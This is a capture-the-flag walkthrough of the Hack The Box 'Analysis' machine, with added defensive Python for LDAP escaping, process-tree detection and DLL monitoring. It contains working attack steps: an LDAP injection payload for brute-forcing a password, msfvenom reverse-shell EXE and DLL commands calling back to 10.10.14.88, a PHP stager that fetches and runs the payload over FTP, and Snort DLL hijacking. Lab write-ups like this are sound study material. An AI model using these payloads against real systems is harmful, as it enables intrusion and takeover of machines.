User flag


Analysis.htb

I started by enumerating the VHosts on the web server, as there was no obvious vulnerability on the main website:

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb"
```

The only result should be internal.analysis.htb, so let's fuzz that host for directories:

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/FUZZ
```

[Screenshot: ffuf findings]

After extensive fuzzing, I discovered an interesting PHP file:

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/users/FUZZ.php
```

By now we have a file named list.php that requires a parameter. To find its name, we once again use ffuf to brute-force the parameter name (-fs 17 filters out responses of the default size):

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://internal.analysis.htb/users/list.php?FUZZ=dong -fs 17
```

The parameter is called name and appears to be inserted into an LDAP query; passing * as the value lists every entry.

[Screenshot: ffuf findings]

After some research and reading about LDAP injection on HackTricks, I used ffuf to brute-force a user's password one character at a time.

```bash
# Start with this and look for the character that yields a response size of 418
# (-fs 406 filters out the size returned when the guess is wrong)
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=FUZZ*)' -fs 406

# Prepend each confirmed character to FUZZ and repeat until you have the whole password
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=9FUZZ*)' -fs 406

ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97FUZZ*)' -fs 406
```

🔍 Hint: The password contains a '*'; insert it when no other character yields a response of size 418.
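The root cause above is that list.php interpolates the name parameter straight into an LDAP search filter, so the filter grammar ends up under the caller's control. The following Python is an added example of mine (not code from the post, and not the box's list.php, whose source is not shown): it contrasts the assumed vulnerable construction with one that escapes the value per RFC 4515 (the same thing PHP's ldap_escape with LDAP_ESCAPE_FILTER does), and adds a cheap request-time check a defender can log on. The filter shape `(&(objectClass=user)(cn=...))` is an assumption.

```python
# Added example: neutralising LDAP filter injection with RFC 4515 escaping.
# The filter shape below is an assumption; the box's list.php source is not shown.

# Characters RFC 4515 requires to be escaped inside an assertion value.
_ESCAPE = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape user input for use as an LDAP filter assertion value (RFC 4515)."""
    return "".join(_ESCAPE.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    """Assumed vulnerable construction: the parameter is interpolated verbatim,
    so a value containing ')(' closes the cn assertion and opens new ones."""
    return f"(&(objectClass=user)(cn={name}))"


def build_filter_safe(name: str) -> str:
    """Hardened construction: the parameter can only ever be a literal value."""
    return f"(&(objectClass=user)(cn={escape_filter_value(name)}))"


def looks_like_filter_injection(value: str) -> bool:
    """Request-time check for a WAF rule or log review: a person's name has no
    business containing wildcards, parentheses, backslashes or NUL bytes."""
    return any(ch in value for ch in "*()\\\x00")


# Constructed input: the URL-decoded form of the probe used in the post.
PROBE = "*)(&(objectClass=user)(description=9*"

if __name__ == "__main__":
    print("unsafe :", build_filter_unsafe(PROBE))
    print("safe   :", build_filter_safe(PROBE))
    print("flagged:", looks_like_filter_injection(PROBE))
```

With the safe builder the whole probe becomes a literal cn value that matches nothing, so the size-based oracle disappears. Escaping does not fix the second problem the walkthrough relies on, a password stored in the description attribute; that needs to be removed from the directory as well.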

Earlier we found a route called /employees; maybe there is some sort of login there.

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u http://internal.analysis.htb/employees/FUZZ.php
```

Indeed there is a login.php. Logging in with the gathered credentials, we are presented with a dubious file upload form.

[Screenshot: ffuf findings]

I generated a reverse shell with msfvenom and a PHP file that uses cmd.exe to download it to the machine over FTP and run it.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4711 -f exe -o /usr/share/tools/tmp/71973864.exe
```

```php
<?php system('cmd.exe /c "@echo open 10.10.14.88 21>gztxpuci.txt&@echo binary>>gztxpuci.txt&@echo GET tmp/71973864.exe >>gztxpuci.txt&@echo quit>>gztxpuci.txt&@ftp -A -s:gztxpuci.txt -v -i&del gztxpuci.txt&71973864.exe"'); ?>
```

🔍 Hint: The msfvenom command and the PHP stager were generated with my PentestServerSuite, which made this process really easy.

The only thing left to do is to find the uploads folder; once again I used ffuf for this.

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/dashboard/FUZZ
```

It found the uploads folder, and of course my PHP file was in it. Requesting the PHP file popped the shell.

[Screenshot: ffuf findings]
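From the blue-team side, the upload-to-shell chain above leaves a very recognisable process tree: the web server's PHP worker spawns cmd.exe, which writes an FTP script with echo redirection and then runs ftp.exe with -s:. The Python below is an added example of mine (not from the post) that runs three such rules over constructed Sysmon-style process-creation events. The field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the sample events, process ids and the benign notepad event are made up for the demo, and the worker-process list is an assumption about what a Windows PHP/IIS host would show.

```python
# Added example: detecting the upload-to-shell chain from process-creation telemetry.
# Event dicts mimic Sysmon Event ID 1 fields; every sample event is constructed.
import re

# Assumed set of web worker binaries for a Windows PHP/IIS deployment.
WEB_WORKERS = ("php-cgi.exe", "php.exe", "w3wp.exe", "httpd.exe", "nginx.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> list[str]:
    """Return the names of every rule that matches this process-creation event."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # Rule 1: a web server worker should never be spawning an interactive shell.
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web_worker_spawned_shell")
    # Rule 2: ftp.exe driven by a script file (-s:) is the classic LOLBin download.
    if image == "ftp.exe" and re.search(r"(?i)-s:", cmdline):
        hits.append("ftp_script_transfer")
    # Rule 3: the script being built on the fly with "echo open <host> ... > x.txt".
    if image in SHELLS and re.search(r"(?i)echo\s+open\s+\S+.*>\s*\S+\.txt", cmdline):
        hits.append("ftp_script_written_by_echo")
    return hits


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map each event's ProcessId to its matching rules, dropping clean events."""
    return {e["ProcessId"]: hits for e in events if (hits := classify_event(e))}


# Constructed sample telemetry: the chain from the post, plus one benign event.
SAMPLE_EVENTS = [
    {"ProcessId": "1001",
     "ParentImage": r"C:\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "@echo open 10.10.14.88 21>gztxpuci.txt&@echo binary>>gztxpuci.txt&@ftp -A -s:gztxpuci.txt -v -i&71973864.exe"'},
    {"ProcessId": "1002",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp -A -s:gztxpuci.txt -v -i"},
    {"ProcessId": "1003",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, "->", ", ".join(rules))
```

Rule 1 alone would have caught this box regardless of the transfer method, which is why "web worker spawns shell" is the alert to invest in; rules 2 and 3 are there to name the technique once the alert fires.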

Root flag


The first thing I did was run winPEAS, which found a location in Snort where we could place a malicious DLL file.

[Screenshot]

Reading through the Snort config files, we find a DLL that Snort loads.

[Screenshot]

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4713 -f dll -o /usr/share/tools/tmp/14904932.dll
# Upload it to C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll
```
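For the defender the lesson is product-independent: the directory a privileged service loads DLLs from must not be writable by low-privileged users, and any DLL that appears or changes there should raise an alarm. The Python below is an added example of mine (not from the post, and not Snort's own tooling) that takes a SHA-256 baseline of a DLL directory, re-checks it, and reports added, modified and removed files, alongside a coarse writability check. The directory name and the DLL file names and contents in the demo are constructed stand-ins, and the demo runs in a temporary directory on any OS.

```python
# Added example: baseline and re-check the DLLs a service loads (not Snort tooling).
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large DLLs do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(directory: Path, suffix: str = ".dll") -> dict[str, str]:
    """Map file name -> SHA-256 for every DLL directly inside the directory."""
    return {p.name: sha256_file(p) for p in sorted(directory.iterdir())
            if p.is_file() and p.suffix.lower() == suffix}


def compare_baseline(directory: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Report which DLLs were added, modified or removed since the baseline."""
    current = take_baseline(directory)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(n for n in current.keys() & baseline.keys()
                           if current[n] != baseline[n]),
    }


def writable_by_current_user(directory: Path) -> bool:
    """Coarse hygiene check: can the account running this script create files
    here? On Windows this reflects the effective ACL, on POSIX the mode bits.
    A DLL directory of a service running as SYSTEM should answer False for
    ordinary users."""
    return os.access(directory, os.W_OK)


def run_demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline two DLLs, then drop a new one, tamper with
    one and delete one, and see all three show up in the report."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "snort_dynamicpreprocessor"   # stand-in for the real path
        lib.mkdir()
        (lib / "legit_a.dll").write_bytes(b"constructed preprocessor A")
        (lib / "legit_b.dll").write_bytes(b"constructed preprocessor B")
        baseline = take_baseline(lib)
        (lib / "sf_engine.dll").write_bytes(b"unexpected new file")  # appears
        (lib / "legit_b.dll").write_bytes(b"tampered")                # changes
        (lib / "legit_a.dll").unlink()                                 # vanishes
        return compare_baseline(lib, baseline)


if __name__ == "__main__":
    print(run_demo())
```

In production the baseline would be stored outside the monitored host (or signed), the check scheduled, and a non-empty "added" or "modified" list routed to the same alert queue as the process-tree rules above; on Windows, the writability check is a prompt to review the directory's ACL with icacls rather than a substitute for it.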

The box was not too hard and entertained me quite well, although the root part was a bit easy.